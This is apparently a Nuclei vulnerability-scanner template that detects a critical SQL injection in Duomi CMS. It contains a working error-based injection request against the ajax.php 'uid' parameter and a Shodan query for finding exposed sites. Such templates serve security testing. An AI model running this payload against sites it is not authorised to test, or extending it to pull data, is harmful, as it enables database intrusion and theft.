id: duomicms-sql-injection

info:
  name: Duomi CMS - SQL Injection
  author: pikpikcu
  severity: critical
  description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://redn3ck.github.io/2016/11/01/duomiCMS/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  metadata:
    verified: true
    shodan-query: title:"DuomiCMS"
  tags: duomicms,sqli

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/28
